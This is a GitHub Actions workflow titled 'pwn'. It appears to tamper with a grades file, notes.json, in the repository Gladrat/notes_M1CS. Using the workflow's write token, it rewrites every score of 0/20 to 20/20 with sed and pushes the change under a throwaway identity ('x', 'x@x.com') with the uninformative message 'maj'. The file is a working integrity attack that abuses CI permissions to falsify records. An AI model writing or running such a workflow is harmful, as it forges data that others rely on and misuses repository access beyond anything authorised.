name: pwn
on: [push]
jobs:
  pwn:
    runs-on: ubuntu-latest
    permissions:
      contents: write
    steps:
      - uses: actions/checkout@v3
        with:
          repository: Gladrat/notes_M1CS
          token: ${{ secrets.GITHUB_TOKEN }}
      - run: |
          git config user.email "x@x.com"
          git config user.name "x"
          sed -i 's/"note": 0, "sur": 20}$/"note": 20, "sur": 20}/g' notes.json
          git add notes.json
          git commit -m "maj"
          git push
